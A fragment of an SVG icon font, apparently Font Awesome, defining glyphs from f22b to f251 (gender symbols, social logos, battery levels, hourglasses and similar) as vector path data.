<glyph unicode="&#xf22b;" horiz-adv-x="2048" d="M1901 621q19 -19 19 -45t-19 -45l-294 -294q-9 -10 -22.5 -10t-22.5 10l-45 45q-10 9 -10 22.5t10 22.5l185 185h-294v-224q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v224h-132q-24 -217 -187.5 -364.5t-384.5 -147.5q-167 0 -306 87t-212 236t-54 319q15 133 88 245.5 t188 182t249 80.5q155 12 292 -52.5t224 -186t103 -271.5h132v224q0 14 9 23t23 9h64q14 0 23 -9t9 -23v-224h294l-185 185q-10 9 -10 22.5t10 22.5l45 45q9 10 22.5 10t22.5 -10zM576 128q185 0 316.5 131.5t131.5 316.5t-131.5 316.5t-316.5 131.5t-316.5 -131.5 t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
<glyph unicode="&#xf22c;" horiz-adv-x="1280" d="M1152 960q0 -221 -147.5 -384.5t-364.5 -187.5v-612q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v612q-217 24 -364.5 187.5t-147.5 384.5q0 117 45.5 223.5t123 184t184 123t223.5 45.5t223.5 -45.5t184 -123t123 -184t45.5 -223.5zM576 512q185 0 316.5 131.5 t131.5 316.5t-131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
<glyph unicode="&#xf22d;" horiz-adv-x="1280" d="M1024 576q0 185 -131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5t316.5 131.5t131.5 316.5zM1152 576q0 -117 -45.5 -223.5t-123 -184t-184 -123t-223.5 -45.5t-223.5 45.5t-184 123t-123 184t-45.5 223.5t45.5 223.5t123 184t184 123 t223.5 45.5t223.5 -45.5t184 -123t123 -184t45.5 -223.5z" />
<glyph unicode="&#xf22e;" horiz-adv-x="1792" />
<glyph unicode="&#xf22f;" horiz-adv-x="1792" />
<glyph unicode="&#xf230;" d="M1451 1408q35 0 60 -25t25 -60v-1366q0 -35 -25 -60t-60 -25h-391v595h199l30 232h-229v148q0 56 23.5 84t91.5 28l122 1v207q-63 9 -178 9q-136 0 -217.5 -80t-81.5 -226v-171h-200v-232h200v-595h-735q-35 0 -60 25t-25 60v1366q0 35 25 60t60 25h1366z" />
<glyph unicode="&#xf231;" horiz-adv-x="1280" d="M0 939q0 108 37.5 203.5t103.5 166.5t152 123t185 78t202 26q158 0 294 -66.5t221 -193.5t85 -287q0 -96 -19 -188t-60 -177t-100 -149.5t-145 -103t-189 -38.5q-68 0 -135 32t-96 88q-10 -39 -28 -112.5t-23.5 -95t-20.5 -71t-26 -71t-32 -62.5t-46 -77.5t-62 -86.5 l-14 -5l-9 10q-15 157 -15 188q0 92 21.5 206.5t66.5 287.5t52 203q-32 65 -32 169q0 83 52 156t132 73q61 0 95 -40.5t34 -102.5q0 -66 -44 -191t-44 -187q0 -63 45 -104.5t109 -41.5q55 0 102 25t78.5 68t56 95t38 110.5t20 111t6.5 99.5q0 173 -109.5 269.5t-285.5 96.5 q-200 0 -334 -129.5t-134 -328.5q0 -44 12.5 -85t27 -65t27 -45.5t12.5 -30.5q0 -28 -15 -73t-37 -45q-2 0 -17 3q-51 15 -90.5 56t-61 94.5t-32.5 108t-11 106.5z" />
<glyph unicode="&#xf232;" d="M985 562q13 0 97.5 -44t89.5 -53q2 -5 2 -15q0 -33 -17 -76q-16 -39 -71 -65.5t-102 -26.5q-57 0 -190 62q-98 45 -170 118t-148 185q-72 107 -71 194v8q3 91 74 158q24 22 52 22q6 0 18 -1.5t19 -1.5q19 0 26.5 -6.5t15.5 -27.5q8 -20 33 -88t25 -75q0 -21 -34.5 -57.5 t-34.5 -46.5q0 -7 5 -15q34 -73 102 -137q56 -53 151 -101q12 -7 22 -7q15 0 54 48.5t52 48.5zM782 32q127 0 243.5 50t200.5 134t134 200.5t50 243.5t-50 243.5t-134 200.5t-200.5 134t-243.5 50t-243.5 -50t-200.5 -134t-134 -200.5t-50 -243.5q0 -203 120 -368l-79 -233 l242 77q158 -104 345 -104zM782 1414q153 0 292.5 -60t240.5 -161t161 -240.5t60 -292.5t-60 -292.5t-161 -240.5t-240.5 -161t-292.5 -60q-195 0 -365 94l-417 -134l136 405q-108 178 -108 389q0 153 60 292.5t161 240.5t240.5 161t292.5 60z" />
<glyph unicode="&#xf233;" horiz-adv-x="1792" d="M128 128h1024v128h-1024v-128zM128 640h1024v128h-1024v-128zM1696 192q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM128 1152h1024v128h-1024v-128zM1696 704q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM1696 1216 q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM1792 384v-384h-1792v384h1792zM1792 896v-384h-1792v384h1792zM1792 1408v-384h-1792v384h1792z" />
<glyph unicode="&#xf234;" horiz-adv-x="2048" d="M704 640q-159 0 -271.5 112.5t-112.5 271.5t112.5 271.5t271.5 112.5t271.5 -112.5t112.5 -271.5t-112.5 -271.5t-271.5 -112.5zM1664 512h352q13 0 22.5 -9.5t9.5 -22.5v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-352v-352q0 -13 -9.5 -22.5t-22.5 -9.5h-192q-13 0 -22.5 9.5 t-9.5 22.5v352h-352q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h352v352q0 13 9.5 22.5t22.5 9.5h192q13 0 22.5 -9.5t9.5 -22.5v-352zM928 288q0 -52 38 -90t90 -38h256v-238q-68 -50 -171 -50h-874q-121 0 -194 69t-73 190q0 53 3.5 103.5t14 109t26.5 108.5 t43 97.5t62 81t85.5 53.5t111.5 20q19 0 39 -17q79 -61 154.5 -91.5t164.5 -30.5t164.5 30.5t154.5 91.5q20 17 39 17q132 0 217 -96h-223q-52 0 -90 -38t-38 -90v-192z" />
<glyph unicode="&#xf235;" horiz-adv-x="2048" d="M704 640q-159 0 -271.5 112.5t-112.5 271.5t112.5 271.5t271.5 112.5t271.5 -112.5t112.5 -271.5t-112.5 -271.5t-271.5 -112.5zM1781 320l249 -249q9 -9 9 -23q0 -13 -9 -22l-136 -136q-9 -9 -22 -9q-14 0 -23 9l-249 249l-249 -249q-9 -9 -23 -9q-13 0 -22 9l-136 136 q-9 9 -9 22q0 14 9 23l249 249l-249 249q-9 9 -9 23q0 13 9 22l136 136q9 9 22 9q14 0 23 -9l249 -249l249 249q9 9 23 9q13 0 22 -9l136 -136q9 -9 9 -22q0 -14 -9 -23zM1283 320l-181 -181q-37 -37 -37 -91q0 -53 37 -90l83 -83q-21 -3 -44 -3h-874q-121 0 -194 69 t-73 190q0 53 3.5 103.5t14 109t26.5 108.5t43 97.5t62 81t85.5 53.5t111.5 20q19 0 39 -17q154 -122 319 -122t319 122q20 17 39 17q28 0 57 -6q-28 -27 -41 -50t-13 -56q0 -54 37 -91z" />
<glyph unicode="&#xf236;" horiz-adv-x="2048" d="M256 512h1728q26 0 45 -19t19 -45v-448h-256v256h-1536v-256h-256v1216q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-704zM832 832q0 106 -75 181t-181 75t-181 -75t-75 -181t75 -181t181 -75t181 75t75 181zM2048 576v64q0 159 -112.5 271.5t-271.5 112.5h-704 q-26 0 -45 -19t-19 -45v-384h1152z" />
<glyph unicode="&#xf237;" d="M1536 1536l-192 -448h192v-192h-274l-55 -128h329v-192h-411l-357 -832l-357 832h-411v192h329l-55 128h-274v192h192l-192 448h256l323 -768h378l323 768h256zM768 320l108 256h-216z" />
<glyph unicode="&#xf238;" d="M1088 1536q185 0 316.5 -93.5t131.5 -226.5v-896q0 -130 -125.5 -222t-305.5 -97l213 -202q16 -15 8 -35t-30 -20h-1056q-22 0 -30 20t8 35l213 202q-180 5 -305.5 97t-125.5 222v896q0 133 131.5 226.5t316.5 93.5h640zM768 192q80 0 136 56t56 136t-56 136t-136 56 t-136 -56t-56 -136t56 -136t136 -56zM1344 768v512h-1152v-512h1152z" />
<glyph unicode="&#xf239;" d="M1088 1536q185 0 316.5 -93.5t131.5 -226.5v-896q0 -130 -125.5 -222t-305.5 -97l213 -202q16 -15 8 -35t-30 -20h-1056q-22 0 -30 20t8 35l213 202q-180 5 -305.5 97t-125.5 222v896q0 133 131.5 226.5t316.5 93.5h640zM288 224q66 0 113 47t47 113t-47 113t-113 47 t-113 -47t-47 -113t47 -113t113 -47zM704 768v512h-544v-512h544zM1248 224q66 0 113 47t47 113t-47 113t-113 47t-113 -47t-47 -113t47 -113t113 -47zM1408 768v512h-576v-512h576z" />
<glyph unicode="&#xf23a;" horiz-adv-x="1792" d="M597 1115v-1173q0 -25 -12.5 -42.5t-36.5 -17.5q-17 0 -33 8l-465 233q-21 10 -35.5 33.5t-14.5 46.5v1140q0 20 10 34t29 14q14 0 44 -15l511 -256q3 -3 3 -5zM661 1014l534 -866l-534 266v600zM1792 996v-1054q0 -25 -14 -40.5t-38 -15.5t-47 13l-441 220zM1789 1116 q0 -3 -256.5 -419.5t-300.5 -487.5l-390 634l324 527q17 28 52 28q14 0 26 -6l541 -270q4 -2 4 -6z" />
<glyph unicode="&#xf23b;" d="M809 532l266 499h-112l-157 -312q-24 -48 -44 -92l-42 92l-155 312h-120l263 -493v-324h101v318zM1536 1408v-1536h-1536v1536h1536z" />
<glyph unicode="&#xf23c;" horiz-adv-x="2296" d="M478 -139q-8 -16 -27 -34.5t-37 -25.5q-25 -9 -51.5 3.5t-28.5 31.5q-1 22 40 55t68 38q23 4 34 -21.5t2 -46.5zM1819 -139q7 -16 26 -34.5t38 -25.5q25 -9 51.5 3.5t27.5 31.5q2 22 -39.5 55t-68.5 38q-22 4 -33 -21.5t-2 -46.5zM1867 -30q13 -27 56.5 -59.5t77.5 -41.5 q45 -13 82 4.5t37 50.5q0 46 -67.5 100.5t-115.5 59.5q-40 5 -63.5 -37.5t-6.5 -76.5zM428 -30q-13 -27 -56 -59.5t-77 -41.5q-45 -13 -82 4.5t-37 50.5q0 46 67.5 100.5t115.5 59.5q40 5 63 -37.5t6 -76.5zM1158 1094h1q-41 0 -76 -15q27 -8 44 -30.5t17 -49.5 q0 -35 -27 -60t-65 -25q-52 0 -80 43q-5 -23 -5 -42q0 -74 56 -126.5t135 -52.5q80 0 136 52.5t56 126.5t-56 126.5t-136 52.5zM1462 1312q-99 109 -220.5 131.5t-245.5 -44.5q27 60 82.5 96.5t118 39.5t121.5 -17t99.5 -74.5t44.5 -131.5zM2212 73q8 -11 -11 -42 q7 -23 7 -40q1 -56 -44.5 -112.5t-109.5 -91.5t-118 -37q-48 -2 -92 21.5t-66 65.5q-687 -25 -1259 0q-23 -41 -66.5 -65t-92.5 -22q-86 3 -179.5 80.5t-92.5 160.5q2 22 7 40q-19 31 -11 42q6 10 31 1q14 22 41 51q-7 29 2 38q11 10 39 -4q29 20 59 34q0 29 13 37 q23 12 51 -16q35 5 61 -2q18 -4 38 -19v73q-11 0 -18 2q-53 10 -97 44.5t-55 87.5q-9 38 0 81q15 62 93 95q2 17 19 35.5t36 23.5t33 -7.5t19 -30.5h13q46 -5 60 -23q3 -3 5 -7q10 1 30.5 3.5t30.5 3.5q-15 11 -30 17q-23 40 -91 43q0 6 1 10q-62 2 -118.5 18.5t-84.5 47.5 q-32 36 -42.5 92t-2.5 112q16 126 90 179q23 16 52 4.5t32 -40.5q0 -1 1.5 -14t2.5 -21t3 -20t5.5 -19t8.5 -10q27 -14 76 -12q48 46 98 74q-40 4 -162 -14l47 46q61 58 163 111q145 73 282 86q-20 8 -41 15.5t-47 14t-42.5 10.5t-47.5 11t-43 10q595 126 904 -139 q98 -84 158 -222q85 -10 121 9h1q5 3 8.5 10t5.5 19t3 19.5t3 21.5l1 14q3 28 32 40t52 -5q73 -52 91 -178q7 -57 -3.5 -113t-42.5 -91q-28 -32 -83.5 -48.5t-115.5 -18.5v-10q-71 -2 -95 -43q-14 -5 -31 -17q11 -1 32 -3.5t30 -3.5q1 4 5 8q16 18 60 23h13q5 18 19 30t33 8 t36 -23t19 -36q79 -32 93 -95q9 -40 1 -81q-12 -53 -56 -88t-97 -44q-10 -2 -17 -2q0 -49 -1 -73q20 15 38 19q26 7 61 2q28 28 51 16q14 -9 14 -37q33 -16 59 -34q27 13 38 4q10 -10 2 -38q28 -30 41 -51q23 8 31 -1zM1937 1025q0 -29 -9 -54q82 -32 112 -132 q4 37 -9.5 98.5t-41.5 90.5q-20 19 -36 17t-16 -20zM1859 925q35 -42 47.5 -108.5t-0.5 -124.5q67 13 97 45q13 14 18 28q-3 64 -31 114.5t-79 66.5q-15 -15 -52 -21zM1822 921q-30 0 -44 1q42 -115 53 -239q21 0 43 3q16 68 1 135t-53 100zM258 839q30 100 112 132 q-9 25 -9 54q0 18 -16.5 20t-35.5 -17q-28 -29 -41.5 -90.5t-9.5 -98.5zM294 737q29 -31 97 -45q-13 58 -0.5 124.5t47.5 108.5v0q-37 6 -52 21q-51 -16 -78.5 -66t-31.5 -115q9 -17 18 -28zM471 683q14 124 73 235q-19 -4 -55 -18l-45 -19v1q-46 -89 -20 -196q25 -3 47 -3z M1434 644q8 -38 16.5 -108.5t11.5 -89.5q3 -18 9.5 -21.5t23.5 4.5q40 20 62 85.5t23 125.5q-24 2 -146 4zM1152 1285q-116 0 -199 -82.5t-83 -198.5q0 -117 83 -199.5t199 -82.5t199 82.5t83 199.5q0 116 -83 198.5t-199 82.5zM1380 646q-106 2 -211 0v1q-1 -27 2.5 -86 t13.5 -66q29 -14 93.5 -14.5t95.5 10.5q9 3 11 39t-0.5 69.5t-4.5 46.5zM1112 447q8 4 9.5 48t-0.5 88t-4 63v1q-212 -3 -214 -3q-4 -20 -7 -62t0 -83t14 -46q34 -15 101 -16t101 10zM718 636q-16 -59 4.5 -118.5t77.5 -84.5q15 -8 24 -5t12 21q3 16 8 90t10 103 q-69 -2 -136 -6zM591 510q3 -23 -34 -36q132 -141 271.5 -240t305.5 -154q172 49 310.5 146t293.5 250q-33 13 -30 34l3 9v1v-1q-17 2 -50 5.5t-48 4.5q-26 -90 -82 -132q-51 -38 -82 1q-5 6 -9 14q-7 13 -17 62q-2 -5 -5 -9t-7.5 -7t-8 -5.5t-9.5 -4l-10 -2.5t-12 -2 l-12 -1.5t-13.5 -1t-13.5 -0.5q-106 -9 -163 11q-4 -17 -10 -26.5t-21 -15t-23 -7t-36 -3.5q-2 0 -3 -0.5t-3 -0.5h-3q-179 -17 -203 40q-2 -63 -56 -54q-47 8 -91 54q-12 13 -20 26q-17 29 -26 65q-58 -6 -87 -10q1 -2 4 -10zM507 -118q3 14 3 30q-17 71 -51 130t-73 70 q-41 12 -101.5 -14.5t-104.5 -80t-39 -107.5q35 -53 100 -93t119 -42q51 -2 94 28t53 79zM510 53q23 -63 27 -119q195 113 392 174q-98 52 -180.5 120t-179.5 165q-6 -4 -29 -13q0 -2 -1 -5t-1 -4q31 -18 22 -37q-12 -23 -56 -34q-10 -13 -29 -24h-1q-2 -83 1 -150 q19 -34 35 -73zM579 -113q532 -21 1145 0q-254 147 -428 196q-76 -35 -156 -57q-8 -3 -16 0q-65 21 -129 49q-208 -60 -416 -188h-1v-1q1 0 1 1zM1763 -67q4 54 28 120q14 38 33 71l-1 -1q3 77 3 153q-15 8 -30 25q-42 9 -56 33q-9 20 22 38q-2 4 -2 9q-16 4 -28 12 q-204 -190 -383 -284q198 -59 414 -176zM2155 -90q5 54 -39 107.5t-104 80t-102 14.5q-38 -11 -72.5 -70.5t-51.5 -129.5q0 -16 3 -30q10 -49 53 -79t94 -28q54 2 119 42t100 93z" />
<glyph unicode="&#xf23d;" horiz-adv-x="2304" d="M1524 -25q0 -68 -48 -116t-116 -48t-116.5 48t-48.5 116t48.5 116.5t116.5 48.5t116 -48.5t48 -116.5zM775 -25q0 -68 -48.5 -116t-116.5 -48t-116 48t-48 116t48 116.5t116 48.5t116.5 -48.5t48.5 -116.5zM0 1469q57 -60 110.5 -104.5t121 -82t136 -63t166 -45.5 t200 -31.5t250 -18.5t304 -9.5t372.5 -2.5q139 0 244.5 -5t181 -16.5t124 -27.5t71 -39.5t24 -51.5t-19.5 -64t-56.5 -76.5t-89.5 -91t-116 -104.5t-139 -119q-185 -157 -286 -247q29 51 76.5 109t94 105.5t94.5 98.5t83 91.5t54 80.5t13 70t-45.5 55.5t-116.5 41t-204 23.5 t-304 5q-168 -2 -314 6t-256 23t-204.5 41t-159.5 51.5t-122.5 62.5t-91.5 66.5t-68 71.5t-50.5 69.5t-40 68t-36.5 59.5z" />
<glyph unicode="&#xf23e;" horiz-adv-x="1792" d="M896 1472q-169 0 -323 -66t-265.5 -177.5t-177.5 -265.5t-66 -323t66 -323t177.5 -265.5t265.5 -177.5t323 -66t323 66t265.5 177.5t177.5 265.5t66 323t-66 323t-177.5 265.5t-265.5 177.5t-323 66zM896 1536q182 0 348 -71t286 -191t191 -286t71 -348t-71 -348 t-191 -286t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71zM496 704q16 0 16 -16v-480q0 -16 -16 -16h-32q-16 0 -16 16v480q0 16 16 16h32zM896 640q53 0 90.5 -37.5t37.5 -90.5q0 -35 -17.5 -64t-46.5 -46v-114q0 -14 -9 -23 t-23 -9h-64q-14 0 -23 9t-9 23v114q-29 17 -46.5 46t-17.5 64q0 53 37.5 90.5t90.5 37.5zM896 1408q209 0 385.5 -103t279.5 -279.5t103 -385.5t-103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103zM544 928v-96 q0 -14 9 -23t23 -9h64q14 0 23 9t9 23v96q0 93 65.5 158.5t158.5 65.5t158.5 -65.5t65.5 -158.5v-96q0 -14 9 -23t23 -9h64q14 0 23 9t9 23v96q0 146 -103 249t-249 103t-249 -103t-103 -249zM1408 192v512q0 26 -19 45t-45 19h-896q-26 0 -45 -19t-19 -45v-512 q0 -26 19 -45t45 -19h896q26 0 45 19t19 45z" />
<glyph unicode="&#xf240;" horiz-adv-x="2304" d="M1920 1024v-768h-1664v768h1664zM2048 448h128v384h-128v288q0 14 -9 23t-23 9h-1856q-14 0 -23 -9t-9 -23v-960q0 -14 9 -23t23 -9h1856q14 0 23 9t9 23v288zM2304 832v-384q0 -53 -37.5 -90.5t-90.5 -37.5v-160q0 -66 -47 -113t-113 -47h-1856q-66 0 -113 47t-47 113 v960q0 66 47 113t113 47h1856q66 0 113 -47t47 -113v-160q53 0 90.5 -37.5t37.5 -90.5z" />
<glyph unicode="&#xf241;" horiz-adv-x="2304" d="M256 256v768h1280v-768h-1280zM2176 960q53 0 90.5 -37.5t37.5 -90.5v-384q0 -53 -37.5 -90.5t-90.5 -37.5v-160q0 -66 -47 -113t-113 -47h-1856q-66 0 -113 47t-47 113v960q0 66 47 113t113 47h1856q66 0 113 -47t47 -113v-160zM2176 448v384h-128v288q0 14 -9 23t-23 9 h-1856q-14 0 -23 -9t-9 -23v-960q0 -14 9 -23t23 -9h1856q14 0 23 9t9 23v288h128z" />
<glyph unicode="&#xf242;" horiz-adv-x="2304" d="M256 256v768h896v-768h-896zM2176 960q53 0 90.5 -37.5t37.5 -90.5v-384q0 -53 -37.5 -90.5t-90.5 -37.5v-160q0 -66 -47 -113t-113 -47h-1856q-66 0 -113 47t-47 113v960q0 66 47 113t113 47h1856q66 0 113 -47t47 -113v-160zM2176 448v384h-128v288q0 14 -9 23t-23 9 h-1856q-14 0 -23 -9t-9 -23v-960q0 -14 9 -23t23 -9h1856q14 0 23 9t9 23v288h128z" />
<glyph unicode="&#xf243;" horiz-adv-x="2304" d="M256 256v768h512v-768h-512zM2176 960q53 0 90.5 -37.5t37.5 -90.5v-384q0 -53 -37.5 -90.5t-90.5 -37.5v-160q0 -66 -47 -113t-113 -47h-1856q-66 0 -113 47t-47 113v960q0 66 47 113t113 47h1856q66 0 113 -47t47 -113v-160zM2176 448v384h-128v288q0 14 -9 23t-23 9 h-1856q-14 0 -23 -9t-9 -23v-960q0 -14 9 -23t23 -9h1856q14 0 23 9t9 23v288h128z" />
<glyph unicode="&#xf244;" horiz-adv-x="2304" d="M2176 960q53 0 90.5 -37.5t37.5 -90.5v-384q0 -53 -37.5 -90.5t-90.5 -37.5v-160q0 -66 -47 -113t-113 -47h-1856q-66 0 -113 47t-47 113v960q0 66 47 113t113 47h1856q66 0 113 -47t47 -113v-160zM2176 448v384h-128v288q0 14 -9 23t-23 9h-1856q-14 0 -23 -9t-9 -23 v-960q0 -14 9 -23t23 -9h1856q14 0 23 9t9 23v288h128z" />
<glyph unicode="&#xf245;" horiz-adv-x="1280" d="M1133 493q31 -30 14 -69q-17 -40 -59 -40h-382l201 -476q10 -25 0 -49t-34 -35l-177 -75q-25 -10 -49 0t-35 34l-191 452l-312 -312q-19 -19 -45 -19q-12 0 -24 5q-40 17 -40 59v1504q0 42 40 59q12 5 24 5q27 0 45 -19z" />
<glyph unicode="&#xf246;" horiz-adv-x="1024" d="M832 1408q-320 0 -320 -224v-416h128v-128h-128v-544q0 -224 320 -224h64v-128h-64q-272 0 -384 146q-112 -146 -384 -146h-64v128h64q320 0 320 224v544h-128v128h128v416q0 224 -320 224h-64v128h64q272 0 384 -146q112 146 384 146h64v-128h-64z" />
<glyph unicode="&#xf247;" horiz-adv-x="2048" d="M2048 1152h-128v-1024h128v-384h-384v128h-1280v-128h-384v384h128v1024h-128v384h384v-128h1280v128h384v-384zM1792 1408v-128h128v128h-128zM128 1408v-128h128v128h-128zM256 -128v128h-128v-128h128zM1664 0v128h128v1024h-128v128h-1280v-128h-128v-1024h128v-128 h1280zM1920 -128v128h-128v-128h128zM1280 896h384v-768h-896v256h-384v768h896v-256zM512 512h640v512h-640v-512zM1536 256v512h-256v-384h-384v-128h640z" />
<glyph unicode="&#xf248;" horiz-adv-x="2304" d="M2304 768h-128v-640h128v-384h-384v128h-896v-128h-384v384h128v128h-384v-128h-384v384h128v640h-128v384h384v-128h896v128h384v-384h-128v-128h384v128h384v-384zM2048 1024v-128h128v128h-128zM1408 1408v-128h128v128h-128zM128 1408v-128h128v128h-128zM256 256 v128h-128v-128h128zM1536 384h-128v-128h128v128zM384 384h896v128h128v640h-128v128h-896v-128h-128v-640h128v-128zM896 -128v128h-128v-128h128zM2176 -128v128h-128v-128h128zM2048 128v640h-128v128h-384v-384h128v-384h-384v128h-384v-128h128v-128h896v128h128z" />
<glyph unicode="&#xf249;" d="M1024 288v-416h-928q-40 0 -68 28t-28 68v1344q0 40 28 68t68 28h1344q40 0 68 -28t28 -68v-928h-416q-40 0 -68 -28t-28 -68zM1152 256h381q-15 -82 -65 -132l-184 -184q-50 -50 -132 -65v381z" />
<glyph unicode="&#xf24a;" d="M1400 256h-248v-248q29 10 41 22l185 185q12 12 22 41zM1120 384h288v896h-1280v-1280h896v288q0 40 28 68t68 28zM1536 1312v-1024q0 -40 -20 -88t-48 -76l-184 -184q-28 -28 -76 -48t-88 -20h-1024q-40 0 -68 28t-28 68v1344q0 40 28 68t68 28h1344q40 0 68 -28t28 -68 z" />
<glyph unicode="&#xf24b;" horiz-adv-x="2304" d="M1951 538q0 -26 -15.5 -44.5t-38.5 -23.5q-8 -2 -18 -2h-153v140h153q10 0 18 -2q23 -5 38.5 -23.5t15.5 -44.5zM1933 751q0 -25 -15 -42t-38 -21q-3 -1 -15 -1h-139v129h139q3 0 8.5 -0.5t6.5 -0.5q23 -4 38 -21.5t15 -42.5zM728 587v308h-228v-308q0 -58 -38 -94.5 t-105 -36.5q-108 0 -229 59v-112q53 -15 121 -23t109 -9l42 -1q328 0 328 217zM1442 403v113q-99 -52 -200 -59q-108 -8 -169 41t-61 142t61 142t169 41q101 -7 200 -58v112q-48 12 -100 19.5t-80 9.5l-28 2q-127 6 -218.5 -14t-140.5 -60t-71 -88t-22 -106t22 -106t71 -88 t140.5 -60t218.5 -14q101 4 208 31zM2176 518q0 54 -43 88.5t-109 39.5v3q57 8 89 41.5t32 79.5q0 55 -41 88t-107 36q-3 0 -12 0.5t-14 0.5h-455v-510h491q74 0 121.5 36.5t47.5 96.5zM2304 1280v-1280q0 -52 -38 -90t-90 -38h-2048q-52 0 -90 38t-38 90v1280q0 52 38 90 t90 38h2048q52 0 90 -38t38 -90z" />
<glyph unicode="&#xf24c;" horiz-adv-x="2304" d="M858 295v693q-106 -41 -172 -135.5t-66 -211.5t66 -211.5t172 -134.5zM1362 641q0 117 -66 211.5t-172 135.5v-694q106 41 172 135.5t66 211.5zM1577 641q0 -159 -78.5 -294t-213.5 -213.5t-294 -78.5q-119 0 -227.5 46.5t-187 125t-125 187t-46.5 227.5q0 159 78.5 294 t213.5 213.5t294 78.5t294 -78.5t213.5 -213.5t78.5 -294zM1960 634q0 139 -55.5 261.5t-147.5 205.5t-213.5 131t-252.5 48h-301q-176 0 -323.5 -81t-235 -230t-87.5 -335q0 -171 87 -317.5t236 -231.5t323 -85h301q129 0 251.5 50.5t214.5 135t147.5 202.5t55.5 246z M2304 1280v-1280q0 -52 -38 -90t-90 -38h-2048q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h2048q52 0 90 -38t38 -90z" />
<glyph unicode="&#xf24d;" horiz-adv-x="1792" d="M1664 -96v1088q0 13 -9.5 22.5t-22.5 9.5h-1088q-13 0 -22.5 -9.5t-9.5 -22.5v-1088q0 -13 9.5 -22.5t22.5 -9.5h1088q13 0 22.5 9.5t9.5 22.5zM1792 992v-1088q0 -66 -47 -113t-113 -47h-1088q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h1088q66 0 113 -47t47 -113 zM1408 1376v-160h-128v160q0 13 -9.5 22.5t-22.5 9.5h-1088q-13 0 -22.5 -9.5t-9.5 -22.5v-1088q0 -13 9.5 -22.5t22.5 -9.5h160v-128h-160q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h1088q66 0 113 -47t47 -113z" />
<glyph unicode="&#xf24e;" horiz-adv-x="2304" d="M1728 1088l-384 -704h768zM448 1088l-384 -704h768zM1269 1280q-14 -40 -45.5 -71.5t-71.5 -45.5v-1291h608q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-1344q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h608v1291q-40 14 -71.5 45.5t-45.5 71.5h-491q-14 0 -23 9t-9 23v64 q0 14 9 23t23 9h491q21 57 70 92.5t111 35.5t111 -35.5t70 -92.5h491q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-491zM1088 1264q33 0 56.5 23.5t23.5 56.5t-23.5 56.5t-56.5 23.5t-56.5 -23.5t-23.5 -56.5t23.5 -56.5t56.5 -23.5zM2176 384q0 -73 -46.5 -131t-117.5 -91 t-144.5 -49.5t-139.5 -16.5t-139.5 16.5t-144.5 49.5t-117.5 91t-46.5 131q0 11 35 81t92 174.5t107 195.5t102 184t56 100q18 33 56 33t56 -33q4 -7 56 -100t102 -184t107 -195.5t92 -174.5t35 -81zM896 384q0 -73 -46.5 -131t-117.5 -91t-144.5 -49.5t-139.5 -16.5 t-139.5 16.5t-144.5 49.5t-117.5 91t-46.5 131q0 11 35 81t92 174.5t107 195.5t102 184t56 100q18 33 56 33t56 -33q4 -7 56 -100t102 -184t107 -195.5t92 -174.5t35 -81z" />
<glyph unicode="&#xf250;" d="M1408 1408q0 -261 -106.5 -461.5t-266.5 -306.5q160 -106 266.5 -306.5t106.5 -461.5h96q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-1472q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96q0 261 106.5 461.5t266.5 306.5q-160 106 -266.5 306.5t-106.5 461.5h-96q-14 0 -23 9 t-9 23v64q0 14 9 23t23 9h1472q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-96zM874 700q77 29 149 92.5t129.5 152.5t92.5 210t35 253h-1024q0 -132 35 -253t92.5 -210t129.5 -152.5t149 -92.5q19 -7 30.5 -23.5t11.5 -36.5t-11.5 -36.5t-30.5 -23.5q-77 -29 -149 -92.5 t-129.5 -152.5t-92.5 -210t-35 -253h1024q0 132 -35 253t-92.5 210t-129.5 152.5t-149 92.5q-19 7 -30.5 23.5t-11.5 36.5t11.5 36.5t30.5 23.5z" />
<glyph unicode="&#xf251;" d="M1408 1408q0 -261 -106.5 -461.5t-266.5 -306.5q160 -106 266.5 -306.5t106.5 -461.5h96q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-1472q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96q0 261 106.5 461.5t266.5 306.5q-160 106 -266.5 306.5t-106.5 461.5h-96q-14 0 -23 9 t-9 23v64q0 14 9 23t23 9h1472q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-96zM1280 1408h-1024q0 -66 9 -128h1006q9 61 9 128zM1280 -128q0 130 -34 249.5t-90.5 208t-126.5 152t-146 94.5h-230q-76 -31 -146 -94.5t-126.5 -152t-90.5 -208t-34 -249.5h1024z" />
